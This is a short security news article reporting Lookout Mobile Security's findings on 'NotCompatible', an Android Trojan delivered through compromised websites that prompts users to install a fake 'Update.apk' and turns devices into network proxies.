According to a blog by Lookout Mobile Security, this is the first time it has identified infected websites as being used to specifically target mobile devices. However, it also said that affected sites appear to have relatively low traffic and it expected the total impact to Android users to be low.
It said that the Android-specific Trojan ‘NotCompatible' appears to serve as a simple TCP relay/proxy while posing as a system update, and does not appear to cause any direct harm to a target device – but it could be used to gain illicit access to private networks by turning an infected device into a proxy.
It explained that in this specific attack, if a user visits a compromised website from an Android device, their browser will automatically begin downloading an application named ‘Update.apk'; when it has finished downloading, the device will display a notification prompting the user to install the app.
To actually install the app, it must have the “Unknown sources” setting enabled (commonly known as “sideloading”), otherwise the installation will be blocked.
For a user to be infected, the website needs a hidden iframe at the bottom of each page. Lookout also said the Trojan does not go to great lengths to hide its intended purpose, but a device infected with NotCompatible could be used to gain access to normally protected information or systems.
Google removed malicious applications in December 2011 after they were downloaded 14,000 times, while in March 2011, 21 free applications were taken off the Android market after they were discovered to be malicious.